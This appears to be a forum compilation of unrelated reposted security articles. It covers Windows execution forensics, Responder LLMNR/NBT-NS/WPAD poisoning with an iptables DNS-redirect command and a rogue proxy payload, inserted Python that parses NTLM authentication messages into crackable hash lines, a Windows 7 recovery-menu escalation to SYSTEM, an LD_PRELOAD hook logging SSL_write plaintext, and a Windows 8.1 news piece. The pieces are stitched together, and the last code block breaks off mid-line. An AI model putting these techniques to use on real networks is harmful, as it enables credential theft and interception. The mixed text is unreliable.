We're not going to discuss hibernation files here, as once you access a hibernation file and begin analysis, there really is very little difference between analyzing the hibernation file and analyzing a memory dump from a live system. Many of the techniques that you'd use, and the artifacts that you would look for, are pretty much the same.

Tools: text viewer

Malware Detection

Another use of this artifact category is that it can be extremely valuable in detecting the presence of malware on a system. However, malware detection is a topic that is best addressed in another post, as there is simply too much information to limit the topic to just a portion of a blog post.

Resources

This idea of determining program execution has been discussed before:
Timeline Analysis, and Program Execution
There Are Four Lights: Program Execution

Posted by Keydet89

Sursa: Windows Incident Response: HowTo: Determine Program Execution
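The Service Control Manager triage described in the post above, as an added example that is not part of the original post or of RegRipper/LogParser: it walks a set of System Event Log records in the shape of a CSV export (TimeGenerated, EventID, SourceName, Message), treats EventLog event 6005 ("The Event log service was started") as the boot marker, and flags 7035/7036 events whose service name is one of the lateral-movement names listed in the post or whose start falls well after the last boot. The sample records, the ten-minute boot window and the regular expression for the SCM message text are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (not real evidence) in the style of a LogParser CSV
# export of the System Event Log: TimeGenerated,EventID,SourceName,Message
SAMPLE_CSV = """\
2013-07-09 08:01:12,6005,EventLog,The Event log service was started.
2013-07-09 08:01:40,7036,Service Control Manager,The Windows Update service entered the running state.
2013-07-09 08:01:41,7036,Service Control Manager,The Workstation service entered the running state.
2013-07-09 13:22:05,7035,Service Control Manager,The PSEXESVC service was successfully sent a start control.
2013-07-09 13:22:05,7036,Service Control Manager,The PSEXESVC service entered the running state.
2013-07-09 13:22:30,7036,Service Control Manager,The PSEXESVC service entered the stopped state.
2013-07-09 14:05:00,7035,Service Control Manager,The wmiApSrv service was successfully sent a start control.
"""

# Service names the post associates with lateral movement (compared case-insensitively).
LATERAL_MOVEMENT_SERVICES = {"psexesvc", "xcmdsvc", "rcmdsvc", "atsvc"}

# Assumption for the example: a service start more than ten minutes after the
# boot marker is "well after boot" and worth a look.
BOOT_WINDOW = timedelta(minutes=10)

# Matches the two SCM message shapes seen in 7035/7036 events and captures the service name.
SERVICE_RE = re.compile(
    r"^The (.+?) service (?:was successfully sent a (\w+) control|entered the (\w+) state)\.$"
)


def parse_records(text):
    """Turn the CSV-style export into a list of dicts with a real datetime per record."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, src, msg = line.split(",", 3)
        records.append({
            "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "id": int(eid),
            "source": src,
            "message": msg,
        })
    return records


def service_name(message):
    """Extract the service name from an SCM 7035/7036 message, or None if it does not match."""
    m = SERVICE_RE.match(message)
    return m.group(1) if m else None


def triage_services(records):
    """Return (time, event_id, service, reasons) for SCM events that deserve a closer look."""
    last_boot = None
    findings = []
    for r in sorted(records, key=lambda rec: rec["time"]):
        # EventLog 6005 marks the start of the event log service, i.e. a boot.
        if r["source"] == "EventLog" and r["id"] == 6005:
            last_boot = r["time"]
            continue
        if r["source"] != "Service Control Manager" or r["id"] not in (7035, 7036):
            continue
        svc = service_name(r["message"])
        if svc is None:
            continue
        reasons = []
        if svc.lower() in LATERAL_MOVEMENT_SERVICES:
            reasons.append("known remote-execution service name")
        # 7035 is the start/stop control; 7036 "running" is the service actually coming up.
        is_start = r["id"] == 7035 or "entered the running state" in r["message"]
        if is_start and last_boot is not None and r["time"] - last_boot > BOOT_WINDOW:
            reasons.append("started %s after boot" % (r["time"] - last_boot))
        if reasons:
            findings.append((r["time"], r["id"], svc, reasons))
    return findings


if __name__ == "__main__":
    for when, eid, svc, why in triage_services(parse_records(SAMPLE_CSV)):
        print(when, eid, svc, "; ".join(why))
```

Against the sample above the two boot-time services are ignored, every PSEXESVC event is reported (the stop event too, on name alone), and wmiApSrv is reported only because it came up six hours after the boot marker; on a real export the boot marker and the window should be chosen from the timeline, not assumed.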
-
Owning Windows Networks with Responder 1.7

A lot has been happening with Responder lately! Everything is still written in pure Python for portability's sake; there's no need to install any third-party libraries.

For starters, Responder is a passive credentials gathering tool. It listens for specific NBT-NS (NetBIOS Name Service) and LLMNR (Link-local Multicast Name Resolution) queries and poisons the issuer. Responder has several rogue authentication servers listening on several UDP and TCP ports. If you want more information on LLMNR & NBT-NS poisoning, read my previous blog post: Introducing Responder-1.0 - SpiderLabs Anterior

New Functionalities in Responder:
- Rogue SMB server now makes use of SMB Extended Security NTLMSSP authentication (NTLMv1/v2) by default, so you won't miss a hash!
- Rogue FTP server clear text credential capture module (enabled by default).
- Small DNS server (enabled by default).
- ICMP Redirects utility for Windows =< 5.2 Domain members.
- Stealth mode Domain Controller finder (enabled by default).
- Host Fingerprint module (need to specify -f On).
- All activity is now logged into a file named Responder-Session.log with date and time for each entry.
- Ability to switch On/Off any rogue server via command line.
- Ability to specify a different challenge for all NTLM rogue servers.
- NT4 specific SMB clear text credentials support.

Responder 1.7 in action:

ICMP Redirect for Windows =< 5.2 Domain members:

Windows =< 5.2 Domain members (XP, Windows Server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host. Yes, you heard me right.

Case scenario example:
Attacker has IP address 192.168.2.10
Domain controller has IP address 192.168.3.58, which is also the primary DNS server.
Victim workstation has IP address 192.168.2.39
Gateway has IP address 192.168.2.1

This screenshot reflects the victim's default route prior to using the Responder ICMP Redirect utility:

So we start by disabling outgoing ICMP requests:

We launch the Responder Icmp-Redirect.py utility accordingly:

Back to the XP domain member's route configuration:

Now we can create a NAT firewall rule and answer all DNS queries for 192.168.3.58 from 192.168.2.39 by issuing this command as root:

iptables -t nat -A PREROUTING -p udp --dst 192.168.3.58 --dport 53 -j DNAT --to-destination 192.168.2.10:53

From there, Responder will reply to DNS requests and make use of its rogue authentication servers:

Stealth Domain Controller Finder:

Responder has a Browser listener (UDP 138) and waits for Domain Master Browser (DMB) Announcements. In a Windows NT domain context, only the Primary Domain Controller can be the DMB according to Microsoft documentation. If there's no domain set and workstations are in a Workgroup, usually the Local Master Browser (LMB) will be the DMB. In this example, Responder is simply listening on port UDP 138:

OS fingerprint module:

When enabled, the fingerprint module will fingerprint any host who issued either an LLMNR or NBT-NS query:

FTP credential module:

This module will grab plaintext FTP credentials:

Final words:

Apart from the fact that with its internal components Responder is a great tool to gather encrypted or clear text credentials passively, it can also be combined with ARP spoofing attacks in order to amplify its results. As always, the latest version is available here: https://github.com/SpiderLabs/Responder

Owning Windows Networks With Responder Part 2

One of the great things about working within SpiderLabs is that we prefer to use our own tools whenever possible. The biggest advantage to using your own toolset is a lot more control over what's happening during the testing process, helping to avoid any nasty side effects. It also provides a better insight into vulnerabilities and where best they can be used. For these reasons there has been a lot of support from my colleagues on the SpiderLabs network pentest team for Responder. Another advantage is the ability to greatly shorten the feedback/development loop. New Responder features have been suggested by members of the pentest team and we've been able to test then deploy them into the field that same day.

New Functionalities in Responder:
- Built-in proxy server, supporting NTLMSSP and Basic authentication scheme. This proxy is listening on port TCP 3141 and can be switched on/off.
- The HTTP server was updated to handle WPAD requests.
- Built-in LDAP rogue server supporting NTLMSSP and Simple Bind (clear text) authentication schemes. This module can be combined with the ICMP-Redirect utility and the DNS server to be reliably effective.

How WPAD works:

WPAD in a corporate Windows environment is used to automatically configure Internet Explorer proxy settings. This functionality is enabled by default on all Windows releases since Windows 2000.

WPAD setup can be boiled down like this: If no wpad file was specified in a DHCP-INFORM packet (opcode 252), a DNS type A query will be issued for wpad; if DNS fails, then Link-local Multicast Name Resolution (LLMNR) will be used on Windows >= Vista; if it fails again, then NetBIOS Name Service (NBT-NS) will be used.

Once the WPAD server is found, the client will initiate an HTTP GET request and retrieve the /wpad.dat file, which is a JavaScript-like file. This file is meant to contain basic or advanced proxy usage directives. Once this file is retrieved, Internet Explorer will use the retrieved settings and connect to the proxy server for all HTTP requests. This website provides a good guide on how to implement your wpad.dat files for your needs.

Abusing the WPAD functionality, the Responder way:

In this release, Responder takes care of Web Proxy Autodiscovery Protocol (WPAD) requests. Responder will answer to WPAD LLMNR and NBT-NS queries and provide a wpad.dat file. The JavaScript payload used is pretty simple:

function FindProxyForURL(url, host)
{
    return 'PROXY wpadwpadwpad:3141; DIRECT';
}

This function contains the following directives:
- Use a proxy server for all connections. The Responder proxy server is set to wpadwpadwpad:3141
- If this proxy server fails for whatever reason, then access the website directly.

Once Internet Explorer retrieves this file, all connections will be redirected to the Responder proxy server. It can be noted that no IP address is specified for this proxy but a local name (wpadwpadwpad), and there's a reason for that: we want this local name to be queried via LLMNR or NBT-NS, which Responder will resolve. Once this Local Intranet Zone (LIZ) name is resolved, Internet Explorer will connect to Responder and send its NTLM hashes transparently with no password prompt.

The second trick is to abruptly reset the HTTP connection upon receiving Internet Explorer's last NTLM packet exchange (NTLMSSP_AUTH), which contains the NTLM credentials. This allows us to fake a proxy failure so IE will simply connect directly to the website it requested. The cool catch in this is that for each connection IE will try to reuse the proxy even if it failed before. This means that Responder is able to catch the cookies for each web request transparently.

This screenshot demonstrates what happens when you open Internet Explorer on a Windows Server 2008R2 Domain Controller by default:

Since everything works well, the user continues to browse online:

As it can be noted, Responder was able to grab the cookies for google.com and msn.ca and the currently logged in user's NTLM credentials. In this video, you can see Responder 1.9 taking advantage of WPAD:

Since a lot of cookies can be gathered while using Responder, they are now stored in a folder named HTTPCookies.
Sursa: Owning Windows Networks with Responder 1.7 - SpiderLabs Anterior Sursa: Owning Windows Networks With Responder Part 2 - SpiderLabs Anterior
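Both posts above rely on the same thing: once a client is tricked into authenticating to a rogue SMB/HTTP/proxy server, its last message is an NTLMSSP AUTHENTICATE (Type 3) packet, and the pieces of that packet plus the server challenge the rogue server handed out are what end up in the log as a crackable hash. The following is an added example, not Responder's own code, that builds a minimal Type 3 message from constructed values, parses it back by its length/offset descriptors, and formats the result the way cracking tools expect (user::domain:challenge:NTProofStr:blob for NTLMv2, user::domain:LM:NT:challenge for NTLMv1). The sample user, domain, NTProofStr and blob are made up; the 1122334455667788 challenge is assumed here as the fixed server challenge of a rogue server like the one the post says can be set on the command line.

```python
import struct

SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001  # strings in the payload are UTF-16LE when set

# Constructed sample values (not captured traffic).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")      # assumed fixed rogue-server challenge
SAMPLE_NT_PROOF = bytes.fromhex("00112233445566778899aabbccddeeff")  # 16-byte NTProofStr
SAMPLE_BLOB = (bytes.fromhex("0101000000000000")          # NTLMv2 client challenge "blob" header
               + bytes(8)                                 # timestamp (zeroed for the example)
               + bytes(range(8))                          # client nonce
               + bytes(4)                                 # reserved
               + bytes(4))                                # empty AV pair list terminator


def build_type3(user, domain, workstation, nt_response,
                lm_response=b"\x00" * 24, flags=NTLMSSP_NEGOTIATE_UNICODE):
    """Assemble an AUTHENTICATE message: 64-byte header (no Version/MIC) followed by the payload.

    Each of the six variable fields is described by (Len, MaxLen, Offset) in the header and
    stored at that absolute offset in the message.
    """
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
    fields = [lm_response, nt_response, domain.encode(enc), user.encode(enc),
              workstation.encode(enc), b""]  # last one: EncryptedRandomSessionKey (empty here)
    offset = 64
    descriptors = b""
    payload = b""
    for f in fields:
        descriptors += struct.pack("<HHI", len(f), len(f), offset)
        payload += f
        offset += len(f)
    return SIGNATURE + struct.pack("<I", 3) + descriptors + struct.pack("<I", flags) + payload


def _field(msg, pos):
    """Read a (Len, MaxLen, Offset) descriptor at pos and return the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]


def parse_type3(msg):
    """Pull the responses and identity strings out of an AUTHENTICATE message by descriptor."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
    return {
        "lm_response": _field(msg, 12),
        "nt_response": _field(msg, 20),
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
        "flags": flags,
    }


def to_hashcat(parsed, server_challenge):
    """Format the captured exchange as a NetNTLMv2 or NetNTLMv1 line for offline cracking."""
    nt = parsed["nt_response"]
    if len(nt) > 24:
        # NTLMv2: the first 16 bytes are the NTProofStr (HMAC-MD5), the rest is the client blob.
        return "%s::%s:%s:%s:%s" % (parsed["user"], parsed["domain"],
                                    server_challenge.hex(), nt[:16].hex(), nt[16:].hex())
    # NTLMv1: 24-byte LM and NT responses, challenge last.
    return "%s::%s:%s:%s:%s" % (parsed["user"], parsed["domain"],
                                parsed["lm_response"].hex(), nt.hex(), server_challenge.hex())


def demo():
    """Round-trip a constructed NTLMv2 authentication and return the cracking-tool line."""
    msg = build_type3("jsmith", "CORP", "WS01", SAMPLE_NT_PROOF + SAMPLE_BLOB)
    return to_hashcat(parse_type3(msg), SERVER_CHALLENGE)


if __name__ == "__main__":
    print(demo())
```

The parser deliberately reads every field through its descriptor rather than by fixed position, because real clients add the Version block and MIC between the flags and the payload; the offsets stay correct either way. The NTProofStr is an HMAC-MD5 over the server challenge and the blob keyed with the user's NT hash, which is why a fixed, known server challenge is enough to crack or rainbow-table the capture offline.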
-
A look at the black underbelly of Windows 8.1 'Blue'

Pieces of Windows 8 inexplicably didn't survive the jump to Windows 8.1, and a new feature allows Microsoft to track your local searches

By Woody Leonhard | InfoWorld

As Windows 8.1 Milestone Preview testers push and prod their way into the dark corners of Windows 8.1 "Blue," they're finding a bunch of things that go bump in the night. From new and likely unwelcome features, to nudges into the Microsoft data tracking sphere, to entire lopped-off pieces of Windows 8, it looks like Microsoft is changing Windows to further its own agenda.

I'm not talking about the well-documented gotchas with the Win 8.1 Preview -- Microsoft makes no bones about the fact you won't be able to upgrade directly from the Preview to the final, shipping version of Windows 8.1, for example, and it warns repeatedly that you can't uninstall the Milestone Preview. I'm also not talking about typical beta blues -- clicking on a Metro app button and getting dumped back on the Metro Start screen kind of comes with the beta-testing ride. Nor am I talking about the updates to the Preview that have already shipped: I count 10 installed on my 64-bit test machine through Windows Update (not bad for a beta that's only been out for a couple of weeks).

The changes I'm seeing are more ... inscrutable. Some people think they're sinister. Few of them have even a wisp of documentation. We potential Windows 8.1 customers are left trying to figure out what Microsoft intends to do and how the changes will affect the way we work.

Microsoft Accounts bare its fangs

With Windows 8, you're encouraged to set up every new Windows user with a Microsoft Account -- which is to say, it's easy to set up a new user by employing an email address that's been registered with Microsoft. It's possible to create a new Win8 user without providing a Microsoft Account, but you need to click a few rather obscure links in the setup routine to get around the restriction.

On the other hand, it's very difficult to install Windows 8.1 "Blue" Preview without using a Microsoft Account. While there are some clever workarounds to bypass the forced Microsoft Account login, you have to be quite persistent to get the Preview installed without linking your installation -- your computer's unique ID -- to your Microsoft Account. Microsoft says that the Microsoft Account requirement will be lifted for the final release:

Warning: In order to use Windows 8.1 Preview you must sign in to your PC with a Microsoft account. The option to create a local account will be made available at the final release of Windows 8.1.

But there are no details about how the requirement will be lifted or whether the same hoops that worked with Windows 8 will work with the final version of Windows 8.1.

Microsoft can track your local searches

If you use Microsoft Bing or Google search -- or almost any other search engine -- you already know that Microsoft and/or Google can and do keep track of your searches. That's why a casual Web search for "flugelhorn" will result in you seeing targeted ads for flugelhorns on almost every site you visit for the following month.

But running a search on your computer for "flugelhorn" through the Windows 8 Search charm doesn't increase your chances of seeing online ads for flugelhorns -- I think. Although I can't find a suitable legalistic disclaimer anywhere, Microsoft doesn't appear to be scraping, storing, and regurgitating local computer search strings to, uh, enhance your shopping experience.

That's changing by default in Windows 8.1. The new Win8.1 Smart Search -- invoked by default through the Windows 8.1 Search charm -- not only searches your computer for the string you specify. It also, all by itself, gathers up the terms and runs them through a Bing search.

Making this cool new feature all the more lovable, Microsoft has officially announced that advertisers will be able to dish up advertising to your computer, based on the searches you perform on your computer.

Bing Ads will be an integral part of the new Windows 8.1 Smart Search experience. Now, with a single campaign setup, advertisers can connect with consumers across Bing, Yahoo, and the new Windows Search with highly relevant ads for their search queries. In addition, Bing Ads will include Web previews of websites and the latest features like site links, location, and call extensions, making it easier for consumers to complete tasks and for advertisers to drive qualified leads.

Unless you make Smart Search dumb, you not only hand Microsoft a complete history of all of your local computer search terms, you open your machine up to even more lovely ads, doled out on the Search results pane. If you search for "flugelhorn" on your local computer -- not on the Web, mind you, but on your own computer -- the results that Windows 8.1 shows you will include advertisements for flugelhorns on eBay and Amazon (no, I'm not joking -- try it), local flugelhorn manufacturers, flugelhorn party consultants, and no doubt some day flugelhorn addiction services.

You can turn Smart Search off by bringing up the Settings charm, clicking or tapping Change PC Settings, then choosing Search and Apps, and moving the Use Bing to Search Online slider off.

The Windows Experience Index bites the dust -- or does it?

If you look for the Windows Experience Index in the Windows 8.1 "Blue" Preview, you won't find it. While nobody ever took WEI too seriously -- it's a bit preposterous to think that you can distill a PC's performance down to a single number -- I've long used WEIs to quickly compare computers while I'm out shopping. They're also useful to double-check on new drivers, to see if they've boosted or strangled processing speeds.

Nobody knows for sure -- and Microsoft hasn't commented at all -- but it appears the WEI is dead. Nazmus Khandaker on the McAkins Online blog puts it this way:

Microsoft removed the Experience Index from Windows RT but kept it on the original release of Windows 8 in October 2012. However with Windows 8.1, Microsoft has decided to kill off the Experience Index completely. I have tested this on several PCs (touch and nontouch). Before upgrading my PCs, I was able to view the Experience Index on Windows 8.0. After upgrading to Windows 8.1, they were no longer present.

One possible reason for its sudden disappearance: The lofty and expensive Microsoft Surface Pro gets a 5.6 on the WEI scale. That would've been a good score three or four years ago on a middle-of-the-road PC. I have an old single-core i3 machine with a Windows 8 WEI of 7.0.

The Metro Photos app loses its connections

The Windows 8.1 Metro Photos app that's circulating at the moment is a mess. While it sports a few new features -- crop, rotate, auto slideshows, red-eye removal, all the features you would've expected from a photo app 10 years ago -- the current app can't even access photos stored on a network share or on SkyDrive. Clearly, it was rushed out the door.

The reason for the trampled release appears to be Microsoft's canning of its Facebook and Flickr links. Windows 8 had automatic connections to your local pictures library, network shares, SkyDrive, Facebook, and Flickr; Win8 combines photos from all of those sources and offers them up with one, unified view. The Windows 8.1 "Blue" Preview can only get at local pictures. It uses the cumbersome-but-finger-friendly "file picker" metaphor for selecting files and folders.

Barb Bowman, community moderator for Microsoft's Answers forum and a Microsoft MVP, took Microsoft to task:

Photos App in 8.1 loses most of its best features, e.g., Facebook/Flickr support, network/homegroup support. I've just installed the 8.1 Preview on a desktop. The Photos App has changed:
1. No longer includes the ability to show images from Facebook, Flickr, SkyDrive
2. No longer allows images from other computers or the network

Microsoft hasn't responded officially to the burgeoning complaints, although a person who identified herself as Microsoft employee CarmenZ posted this in response:

In Windows 8, we wanted to provide a way for folks to view their photos on other services knowing there would be few (if any) apps in the store at launch that would do so. Now there are many apps in the store that offer ways to view photos on other services and soon there will even be a Facebook app from Facebook. We're confident Facebook will offer great ways to view and engage socially with photos on Facebook. We welcome Flickr to do the same. In addition, the People app still offers the ability to socially engage with your friends and even your own photos.

Undeterred, Bowman fired back:

This morning I was sending a tweet in a Windows 8[.1] App and when I used the image button, the Photos App opened (and not Windows Explorer, which is what happens on RTM W8) and was able to attach a file from a networked computer. This is more evidence that the Photos App is part of the OS and not an app ... Since the navigation is there, as evidenced by my experience, the question remains as to why there is no support for network folders in the Photos app itself.

Microsoft has responded on the Facebook issue on the original thread, but has pointedly not answered the other questions. If I were to speculate, I'd say that Microsoft ripped out the Facebook and Flickr parts of Metro Photos and, in a hurry, took out SkyDrive and network folder support. It's inconceivable to me that Microsoft would release a Metro Photos app without copious connections to SkyDrive -- if only to sell more SkyDrive space. About the same time this observation hit the fan, Microsoft announced, quite unexpectedly, that Facebook would finally build a Metro Facebook app.

I think we're seeing a quid pro quo in action -- Facebook finally agrees to join the Windows Store and, in exchange, Microsoft agrees to drop Facebook integration from Metro Photos. If true, might other Microsoft Metro apps follow suit? And where's the Metro Flickr app? Times really have changed if Facebook can arm-wrestle Microsoft into submission. (Thanks for the heads-up, AR.)

This story, "A look at the black underbelly of Windows 8.1 'Blue'," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter.

Sursa: A look at the black underbelly of Windows 8.1 'Blue' | Microsoft windows - InfoWorld
-
[h=1]The Psychology of C# Analysis[/h] [h=2]by Coverity on Jul 08, 2013[/h] Our C# expert Eric Lippert provides his take on the psychology of C# analysis, including the business case for C#, developer characteristics and analysis tools. Presentation: The Psychology of C# Analysis
-
[h=3]Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required[/h]

Just wanted to share with you the below, which I have already communicated with Microsoft - according to the MSRC team "An attacker with unrestricted physical access can certainly manipulate a system in multiple ways. This is not something we consider a security vulnerability." thus no CVE. "Computer owners should provide for physical security of systems as part of best practices. There is more discussion of physical access in the "10 Immutable Laws of Security" (Ten Immutable Laws Of Security (Version 2.0)) under Law #3".

The scenario is as follows:

Windows 7 SP1, and Workstation with BIOS settings to restrict boot up from CD, and Workstation joined in Windows Active Directory or Standalone

By forcing the machine to boot or shut down abnormally (e.g. pressing ctrl+alt+del during bootup or pressing the power button (kill) during shutdown), Windows will enter the "Windows Error Recovery" menu asking us whether we wish to "Launch Startup Repair (recommended)" or "Start Windows Normally".

Select the "Launch Startup Repair (recommended)".

The recovery process will display a "Windows is loading files...." message, then after a while we enter the "Startup Repair" process (graphical interface). A message might appear asking you if you want to "Restore your computer using System Restore"; select Cancel if it does.

Shortly, a new message box will come up prompting us "Send information about the problem (recommended)" or "Don't send", and at the bottom of this dialog box the option with label "View problem details" exists. Click on "View problem details"; you will get information such as "Problem signature" and more. Note that at the very bottom of this textarea a link exists which points to the X (temporary RAMDISK) drive (X:\windows\system32\en-US\erofflps.txt). Clicking on the link, Notepad launches.

From there, one can go to File | Open, view all contents of the C/D/X/etc drives, copy files to/from different locations/drives (copy files from others' C:\documents and settings\* profiles, Documents, Desktop etc), create files, launch cmd.exe. As you may have guessed, all cmd commands will run from X's ramdrive context, which means you cannot just "net user newuser password /add && net localgroup administrators newuser /add" and expect newuser to be there on next reboot; you may, though, backdoor C's Windows through other techniques ;) and manipulate the filesystem as "nt authority\system". You have full control; you are not limited.

Through the ms-dos prompt we noticed we had been granted "nt authority\system" privileges, which makes sense to perform the recovery operation, but it's too easy for anyone to abuse them provided he has casual physical access (e.g. in environments such as libraries, universities, offices, reception front desks etc; I will leave your imagination from this point to work :)

The above scenario is also valid if you boot the workstation using the Windows 7 Repair Disc (condition #2 "Workstation with BIOS settings to restrict boot up from CD" should not be met); at some point a Windows "System Recovery Options" dialog box will prompt you to "Load Drivers". Use that option to navigate the OS and own the host.

General note: If you enter Recovery Mode by pressing F9->F8->Repair Your Computer at boot time you will not be able to reproduce the process, as Windows WILL prompt you for credentials. You have to cause an abnormal shutdown (killing the Windows loading process will also do), or use the Windows 7 Repair Disc.

As probably others may agree with me, "nt authority\system" access should not be so easily given (or acquired by default, design, whatever, name it); at a minimum a password prompt or other control should exist to prevent the ownage.

Sursa: IntelComms: Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required
-
[h=1]Function Hooking Part I: Hooking Shared Library Function Calls in Linux[/h] [h=2]Justin Kettner[/h] [h=3]July 1, 2013[/h] When assessing an application for weaknesses in a linux environment, we won’t always have the luxury of freely available source code or documentation. As a result, these situations require more of a black box approach where much of the information about the application will be revealed by attempting to monitor things such as network communications, calls to cryptographic functions, and file I/O. One method of monitoring applications to extract information is to attach a debugger, such as GDB, to the process and to dump register or stack values as breakpoints are hit for the desired function calls. While this has the advantage of giving fine grained control over things such as code flow and register contents, it is also a cumbersome process compared to hooking the function calls of interest to modify their behavior. Function call hooking refers to a range of techniques used to intercept calls to pre-existing functions and wrap around them to modify the function’s behavior at runtime. In this article we’ll be focusing on function hooking in linux using the dynamic loader API, which allows us to dynamically load and execute calls from shared libraries on the system at runtime, and allows us to wrap around existing functions by making use of the LD_PRELOAD environment variable. The LD_PRELOAD environment variable is used to specify a shared library that is to be loaded first by the loader. Loading our shared library first enables us to intercept function calls and using the dynamic loader API we can bind the originally intended function to a function pointer and pass the original arguments through it, effectively wrapping the function call. Let’s use the ubiquitous “hello world” demonstration as an example. In this example we’ll intercept the puts function and change the output. 
Here’s our helloworld.c file: #include <stdio.h> #include <unistd.h> int main() { puts(“Hello world!\n”); return 0; } Here’s our libexample.c file: #include <stdio.h> #include <unistd.h> #include <dlfcn.h> int puts(const char *message) { int (*new_puts)(const char *message); int result; new_puts = dlsym(RTLD_NEXT, “puts”); if(strcmp(message, “Hello world!\n”) == 0) { result = new_puts(“Goodbye, cruel world!\n”); } else { result = new_puts(message); } return result; } Let’s take a moment to examine what’s going on here in our libexample.c file: Line 5 contains our puts function declaration. To intercept the original puts we define a function with the exact same name and function signature as the original libc puts function. Line 7 declares the function pointer new_puts that will point to the originally intended puts function. As before with the intercepting function declaration this pointer’s function signature must match the function signature of puts. Line 10 initializes our function pointer using the dlsym() function. The RTLD_NEXT enum tells the dynamic loader API that we want to return the next instance of the function associated with the second argument (in this case puts) in the load order. We compare the argument passed to our puts hook against “Hello world!\n” on line 12 and if it matches, we replace it with “Goodbye, cruel world!\n”. If the two strings do not match we simply pass the original message on to puts on line 14. Now let’s build everything and test it out: sigma@ubuntu:~/code$ gcc helloworld.c -o helloworld sigma@ubuntu:~/code$ gcc libexample.c -o libexample.so -fPIC -shared -ldl -D_GNU_SOURCE sigma@ubuntu:~/code$ First we compile helloworld.c as one normally would. Next we compile libexample.c into a shared library by specifying the -shared and -fPIC compile flags and link against libdl using the -ldl flag. The -D_GNU_SOURCE flag is specified to satisfy #ifdef conditions that allow us to use the RTLD_NEXT enum. 
Optionally this flag can be replaced by adding “#define _GNU_SOURCE” somewhere near the top of our libexample.c file. After compiling our source files, we set the LD_PRELOAD environment variable to point to the location of our newly created shared library. sigma@ubuntu:~/code$ export LD_PRELOAD=”/home/sigma/code/libexample.so” After setting LD_PRELOAD we’re ready to run our helloworld binary. Executing the binary produces the following output: sigma@ubuntu:~/code$ ./helloworld Goodbye, cruel world! sigma@ubuntu:~/code$ As expected, when our helloworld binary is executed the puts function is intercepted and “Goodbye, cruel world!” rather than the original “Hello world!” string is displayed. Now that we’re familiar with the process of hooking function calls let’s apply it towards a bit more practical example. Let’s pretend for a moment that we have an application that we are assessing and that this application uses OpenSSL to encrypt communications of sensitive data. Let’s also assume that attempts to man-in-the-middle these communications at the network level have been fruitless. To get at this sensitive data we will intercept calls to SSL_write, the function responsible for encrypting then sending data over a socket. Intercepting SSL_write will allow us to log the string sent to the function and pass the original parameters along, effectively bypassing the encryption protections while allowing the application to run normally. 
To get started let’s take a look at the SSL_write function definition: int SSL_write(SSL *ssl, const void *buf, int num); Here’s the code I’ve written to intercept SSL_write in hook.c: #include <stdio.h> #include <unistd.h> #include <dlfcn.h> #include <openssl/ssl.h> int SSL_write(SSL *context, const void *buffer, int bytes) { int (*new_ssl_write)(SSL *context, const void *buffer, int bytes); new_ssl_write = dlsym(RTLD_NEXT, “SSL_write”); FILE *logfile = fopen(“logfile”, “a+”); fprintf(logfile, “Process %d:\n\n%s\n\n\n”, getpid(), (char *)buffer); fclose(logfile); return new_ssl_write(context, buffer, bytes); } As we can see our function definition needs to return an integer and take three arguments: a pointer to an SSL context, a pointer to a buffer containing the string to encrypt, and the number of bytes to write. In addition to our intercepting function definition we define a matching function pointer that will point to the originally intended SSL_write function and initialize it with the dlsym function. After pointing our pointer to the original function, we log the process ID of the process calling SSL_write, and the string sent to it. Next we compile our source to a shared library: sigma@ubuntu:~/code$ gcc hook.c -o libhook.so -fPIC -shared -lssl -D_GNU_SOURCE sigma@ubuntu:~/code$ The only difference between this compilation and last is the -lssl flag, which we specify in order to link our code against the OpenSSL library. Now let’s go ahead and set LD_PRELOAD to point to our newly created libhook library: sigma@ubuntu:~/code$ export LD_PRELOAD=”/home/sigma/code/libhook.so” sigma@ubuntu:~/code$ Now that LD_PRELOAD is set we’re ready to start intercepting calls to SSL_write on processes executed from here onward. To test this let’s go ahead and use the curl utility over HTTPS and intercept the HTTPS request. 
[CODE]sigma@ubuntu:~/code$ curl https://www.netspi.com > /dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 19086    0 19086    0     0  37437      0 --:--:-- --:--:-- --:--:-- 60590
sigma@ubuntu:~/code$[/CODE]

After successful completion of the command there should be a log file that we can examine:

[CODE]sigma@ubuntu:~/code$ cat logfile
Process 11423:

GET / HTTP/1.1
User-Agent: curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
Host: www.netspi.com
Accept: */*


sigma@ubuntu:~/code$[/CODE]

As we can see, the request has been logged in plaintext while the application was allowed to function normally. Had this been a scenario where data integrity relied heavily upon SSL encryption and the assumption that man-in-the-middle attacks would occur only at the network level, any such integrity would have been compromised.

These are really just a few examples of what's possible using the dynamic loader API and LD_PRELOAD. Since the shared library we create is loaded into the running process' memory space, we could do things like dump the memory of the process to examine it at runtime, or tamper with runtime variables. Other uses for this method of function call hooking and loading generally fall under the use case of user-land rootkits and malware, which will be the focus of the next article in this series.

Sursa: https://www.netspi.com/blog/2013/07/01/function-hooking-part-i-hooking-shared-library-function-calls-in-linux/
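The detection side of what the article demonstrates, as an added example that is not part of the article: a process self-check for the traces a preloaded hook leaves behind. Every preloaded object is mapped into the process, so its path appears in /proc/self/maps, and a hook library such as the article's libhook.so normally lives outside the system library directories; the trusted prefix list and the sample maps excerpt are constructed for illustration.

```c
/* Added example, not part of the article: a process self-check for the traces a
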